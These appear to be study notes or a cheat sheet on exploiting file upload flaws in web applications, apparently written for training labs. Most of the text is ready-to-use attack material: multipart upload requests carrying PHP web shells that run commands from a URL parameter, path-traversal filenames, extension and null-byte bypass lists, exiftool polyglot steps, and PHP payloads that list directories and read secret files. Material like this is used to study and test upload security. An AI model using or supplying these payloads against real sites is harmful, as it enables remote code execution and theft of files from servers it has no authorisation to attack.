# Uploading Simple php file

Content-Disposition: form-data; name="avatar"; filename="exploit.php" 
Content-Type: imgage/jpeg

<?php echo file_get_contents('/home/carlos/secret'); ?>

-----------------------------------------------------------------------------
# Changing Content Type

Content-Disposition: form-data; name="avatar"; filename="exploit.php" 
Content-Type: application/x-php

<?php echo system($_GET['cmd']); ?>

-----------------------------------------------------------------------------
# Changing filename directory (Path Traversal)

Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php" 
Content-Type: imgage/jpeg

<?php echo system($_GET['cmd']); ?>

-----------------------------------------------------------------------------
# Changing Content type (Header) - Other possibility, check Pathtraversal Technique
Content-Type: multipart/form-data; boundary=--------012345...

--------012345...
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php" 
Content-Type: imgage/jpeg

<?php echo system($_GET['cmd']); ?>
--------012345... --

-----------------------------------------------------------------------------
# Insufficient blacklisting of dangerous file types

- Permutation
.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module

.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action

.cfm, .cfml, .cfc, .dbm

.swf

.pl, .cgi

.yaws

- Other technique
	- Change to uppercase letters. ex: .Php2
	- Adding a valid extension before the execution extension. ex: . file.png.php
	- Obfuscating file extensions. ex: exploit.p.phphp
	- Special characters. ex: file.php%20, file.php%0d%0a, file.php%00, file.php/
	- Tricking the extension parser. ex: file.php\x00.png, file.php%0d%0a.png, ...
	- Another layer of extensions. ex: file.png.jpg.php, file.php%00.png%00.jpg
	- Exec extension before the valid extension. ex: file.php.png
	- NTFS alternate data stream (ADS)

-----------------------------------------------------------------------------
# Overriding the server configuration

developers can make directory-specific configuration
- IIS    ---> web.config
- Apache ---> .htaccess (possible to overwrite if already there)
- other  ---> Search goolge

-----------------------------------------------------------------------------
# Flawed validation of the file's contents (Byte change)

- Adding the php code inside the comment of exiftool of an image
	- change output file of the jpeg -> -comment="php-code" file.jpeg -o shell.php
	- metadata still think this is a jpeg but will act as php
	- Look inside the file jpeg loaded on the page if it contain the information 
- JPEG files always begin with the bytes (FF D8 FF) --> Server side verification
	- include this byte inside php file (combine with other technique if needed)

- Can verify this using exiftool

-----------------------------------------------------------------------------
# Exploiting file upload race conditions

Modern frameworks mitigate file upload risks by using temporary, sandboxed directories, randomizing file names, and validating uploads before moving them.

When developers bypass frameworks, race conditions and vulnerabilities can arise. For example, some sites upload files directly, relying on anti-virus checks. During validation delays, attackers may exploit the brief window to execute the file.

These issues are often hard to detect without access to source code.

So with the right timing it might be possible to exploit the vulnerability

Also, modern frameworks protect file uploads with sandboxing, random file names, and validation. Bypassing these can create vulnerabilities, like race conditions. Weak randomness (e.g., `uniqid()`) can allow attackers to guess directory names, and larger files can extend the window for such attacks.

Remote Code
XSS            ---> HTML files or SVG images (insert <script>)
XXE            ---> .doc or .xls files (XXE injection attacks)
PUT upload     ---> Simply add php code in like a post message and send via PUT
OPTION upload  ---> Simply add php code in like a post message and send via OPTION
Zip file       ---> (Path traversal name inside the zip) allow overwrite file

# Try uploading the enable file (Ex: jpg), intercept request and modify name
exploit.php%00.jpg      ---> Using null byte can allow you to bypass this (remove the %00.jpg when searching the file)
exploit.php;.jpg        ---> Using different syntax
exploitxC0 x2Ephph      ---> Using multibyte unicode characters
exploit.pHp             ---> Capital letter
exploit.p.phphp         ---> Removing it but leaves behind a valid file extension

# List the directory
<?php echo implode("<br>",array_diff(scandir('/home/User_X/'),array('.','..'))); ?>

# List specific file
<?php echo file_get_contents('/home/User_X/secret'); ?>

# Run Commands
<?php echo system($_GET['command']); ?>